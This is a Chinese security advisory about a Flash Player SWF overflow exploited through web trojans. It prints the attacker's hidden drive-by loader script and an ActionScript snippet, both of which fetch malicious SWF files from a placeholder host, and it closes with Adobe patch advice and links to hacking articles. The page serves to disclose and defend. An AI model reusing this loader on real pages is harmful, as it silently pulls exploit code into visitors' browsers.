FLASH网马官方补丁
最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:
<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write('<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>');
document.write('<param name=”allowScriptAccess” value=”sameDomain”/>');
document.write('<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('<param name=”quality” value=”high”/>');
document.write('<param name=”bgcolor” value=”#ffffff”/>');
document.write('<embed src=”http://www.XXX.cn/flash/XX.swf” src=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('</object>');
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script> 以下为正常的FLASH文件使用的脚本:
// Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop();
该恶意FLASH部分内容如下:
建议:
厂商补丁: Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.adobe.com/go/getflash
相关文章
Sql Injection in DB2数据库...2007-01-01
视窗操作系统密码体系的弱点及对策(图)...2007-01-01
黑客如何利用Ms05002溢出找“肉鸡” (图)...2007-01-01
用漏洞提升计算机控制权限(图)...2007-01-01
UPDATE注射(mysql+php)的两个模式...2007-01-01
动网7.x权限提升漏洞原理...2007-01-01
入侵之中杀防火墙进程的代码...2007-01-01
ADSL密码大集合...2007-01-01
ASP木马后门新思路...2007-01-01
88red生成htm静态页面企业建站系统后门利用代码,用88red做企业占的朋友可要注意了2008-05-05
最新评论